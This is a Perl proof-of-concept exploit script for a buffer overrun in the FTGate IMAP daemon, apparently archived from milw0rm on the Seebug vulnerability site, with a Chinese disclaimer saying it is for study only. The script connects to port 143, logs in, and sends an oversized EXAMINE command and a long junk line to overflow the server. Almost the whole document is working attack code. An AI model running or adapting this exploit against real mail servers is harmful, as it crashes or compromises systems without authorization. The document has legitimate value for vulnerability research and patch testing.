#!/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli io\@lucaercoli.it\n"; print "http://www.lucaercoli.it\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "143", ); unless ($remote) { die "Can't connect to $host" } print "[!] Connected\n"; print "[?] Exploiting...\n"; sleep(1); my $imapd = join ("", "1 login user pass", "\r\n"); print $remote $imapd; sleep(1); my $imapd = join ("", "1 EXAMINE ", "B"x(224), "\r\n"); print $remote $imapd; sleep(1); my $imapd = join ("","C"x(11305), "\r\n"); print $remote $imapd; print "\n[!] Done\n\n\n"; close $remote; # milw0rm.com [2005-11-16]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论